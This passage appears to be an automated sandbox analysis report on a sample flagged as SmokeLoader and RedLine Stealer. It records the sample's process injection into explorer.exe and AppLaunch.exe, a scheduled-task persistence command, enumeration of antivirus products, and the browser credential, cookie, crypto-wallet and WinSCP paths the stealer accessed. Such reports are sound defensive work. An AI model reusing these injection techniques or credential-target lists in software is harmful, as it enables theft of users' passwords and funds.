Source: C:\Users\user\AppData\Roaming\vahvrsu	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8042.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\8042.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Roaming\vahvrsu	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\vahvrsu	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Roaming\tdhvrsu	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\tdhvrsu	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\41CD.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Memory written: C:\Users\user\AppData\Local\Temp\50E3.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\Drivers\csrss.exe	Memory written: C:\ProgramData\Drivers\csrss.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\Drivers\csrss.exe	Memory written: C:\ProgramData\Drivers\csrss.exe base: 400000 value starts with: 4D5A

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\41CD.exe

Code function: 7_2_00141A90 CreateProcessW,VirtualAllocEx,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,

7_2_00141A90

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\file.exe	Thread created: C:\Windows\explorer.exe EIP: 13A1AD0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vahvrsu	Thread created: unknown EIP: 3171AD0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8042.exe	Thread created: unknown EIP: 3401A40
Source: C:\Users\user\AppData\Roaming\vahvrsu	Thread created: unknown EIP: 3121AD0
Source: C:\Users\user\AppData\Roaming\tdhvrsu	Thread created: unknown EIP: 8C41A40

Writes to foreign memory regions

Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 7F79C0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 42E000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 43A000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 30C008	Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\explorer.exe	Memory written: PID: 1340 base: 7F79C0 value: 90			Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 888 base: 7FF72B812D10 value: 90			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Process created: C:\Users\user\AppData\Local\Temp\50E3.exe C:\Users\user\AppData\Local\Temp\50E3.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /Create /XML "C:\Users\user\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"
Source: C:\ProgramData\Drivers\csrss.exe	Process created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
Source: C:\ProgramData\Drivers\csrss.exe	Process created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"

Source: 38B4.exe, 00000006.00000000.2144291498.0000000000F95000.00000002.00000001.01000000.00000006.sdmp, Helper.exe, 00000018.00000000.2402605320.00007FF6A717B000.00000002.00000001.01000000.00000011.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: explorer.exe, 00000001.00000000.1793089251.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1789319236.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1790472980.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.1789319236.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.1789050552.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 00000001.00000000.1789319236.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000001.00000000.1789319236.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	7_2_0015980C
Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	7_2_0015907D
Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Code function: GetLocaleInfoW,	7_2_00159912
Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Code function: GetLocaleInfoW,	7_2_00150105
Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	7_2_001599E1
Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Code function: EnumSystemLocalesW,	7_2_0015931F
Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Code function: EnumSystemLocalesW,	7_2_0015936A
Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Code function: EnumSystemLocalesW,	7_2_0014FB9F
Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Code function: EnumSystemLocalesW,	7_2_00159405
Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	7_2_00159490
Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Code function: GetLocaleInfoW,	7_2_001596E3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\41CD.exe

Code function: 7_2_0014547C cpuid

7_2_0014547C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\41CD.exe

Code function: 7_2_0014588C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

7_2_0014588C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Source: 38B4.exe, 00000006.00000003.2166948753.000000000200F000.00000004.00000020.00020000.00000000.sdmp, 38B4.exe, 00000006.00000003.2150578256.000000000200F000.00000004.00000020.00020000.00000000.sdmp, 38B4.exe, 00000006.00000003.2148883294.0000000002003000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bdagent.exe
Source: 38B4.exe, 00000006.00000003.2166948753.000000000200F000.00000004.00000020.00020000.00000000.sdmp, 38B4.exe, 00000006.00000003.2150578256.000000000200F000.00000004.00000020.00020000.00000000.sdmp, 38B4.exe, 00000006.00000003.2148883294.0000000002003000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dwengine.exe
Source: 38B4.exe, 00000006.00000003.2166948753.000000000200F000.00000004.00000020.00020000.00000000.sdmp, 38B4.exe, 00000006.00000003.2150578256.000000000200F000.00000004.00000020.00020000.00000000.sdmp, 38B4.exe, 00000006.00000003.2148883294.0000000002003000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: virusutilities.exe
Source: 4A1B.exe, 0000000A.00000002.2432360634.000000000891C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: 38B4.exe, 00000006.00000003.2166948753.000000000200F000.00000004.00000020.00020000.00000000.sdmp, 38B4.exe, 00000006.00000003.2150578256.000000000200F000.00000004.00000020.00020000.00000000.sdmp, 38B4.exe, 00000006.00000003.2148883294.0000000002003000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ONLINENT.EXE
Source: 38B4.exe, 00000006.00000003.2166948753.000000000200F000.00000004.00000020.00020000.00000000.sdmp, 38B4.exe, 00000006.00000003.2150578256.000000000200F000.00000004.00000020.00020000.00000000.sdmp, 38B4.exe, 00000006.00000003.2148883294.0000000002003000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SUPERAntiSpyware.exe
Source: 38B4.exe, 00000006.00000003.2166948753.000000000200F000.00000004.00000020.00020000.00000000.sdmp, 38B4.exe, 00000006.00000003.2150578256.000000000200F000.00000004.00000020.00020000.00000000.sdmp, 38B4.exe, 00000006.00000003.2148883294.0000000002003000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: K7TSecurity.exe

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 9.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.41CD.exe.16c000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.41CD.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.41CD.exe.16c000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.4A1B.exe.890000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2373403403.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AppLaunch.exe PID: 4088, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4A1B.exe PID: 6948, type: MEMORYSTR

Yara detected SmokeLoader

Source: Yara match	File source: 0.3.file.exe.2af0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.vahvrsu.2c30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vahvrsu.2b30e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.2ae0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.vahvrsu.2b40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.3.8042.exe.4700000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.8042.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vahvrsu.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.8042.exe.2c40e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2425699854.0000000004700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1805559161.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1805874215.0000000004831000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2105509155.0000000004631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2425830619.0000000004721000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1737285169.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2439565285.0000000002C30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2104350043.0000000002B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2369465159.0000000004700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2048461979.0000000002B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Found many strings related to Crypto-Wallets (likely being stolen)

Source: AppLaunch.exe, 00000009.00000002.2381658030.0000000006A4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum\walletsLR^q
Source: 50E3.exe, 00000010.00000003.2392623852.0000000003B14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: r electroncash BcYhtE72gziJrnt+KgtHZWnEfjc 2038-01-01 00:00:00 193.135.10.219 59999 0
Source: AppLaunch.exe, 00000009.00000002.2381658030.0000000006A4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $^q1C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: AppLaunch.exe, 00000009.00000002.2381658030.0000000006A4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $^q-cjelfplplebdjjenllpjcblmjkfcffne\|JaxxxLiberty
Source: AppLaunch.exe, 00000009.00000002.2381658030.0000000006A4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.walletLR^q
Source: AppLaunch.exe, 00000009.00000002.2381658030.0000000006A4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum\walletsLR^q
Source: AppLaunch.exe, 00000009.00000002.2381658030.0000000006A4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.walletLR^q
Source: AppLaunch.exe, 00000009.00000002.2381658030.0000000006A4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum\walletsLR^q
Source: AppLaunch.exe, 00000009.00000002.2381658030.0000000006A4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $^q5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\SysWOW64\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl

Source: Yara match	File source: 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2381658030.0000000006A4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AppLaunch.exe PID: 4088, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4A1B.exe PID: 6948, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 9.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.41CD.exe.16c000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.41CD.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.41CD.exe.16c000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.4A1B.exe.890000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2373403403.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AppLaunch.exe PID: 4088, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4A1B.exe PID: 6948, type: MEMORYSTR

Yara detected SmokeLoader

Source: Yara match	File source: 0.3.file.exe.2af0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.vahvrsu.2c30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vahvrsu.2b30e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.2ae0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.vahvrsu.2b40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.3.8042.exe.4700000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.8042.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vahvrsu.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.8042.exe.2c40e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2425699854.0000000004700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1805559161.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1805874215.0000000004831000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2105509155.0000000004631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2425830619.0000000004721000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
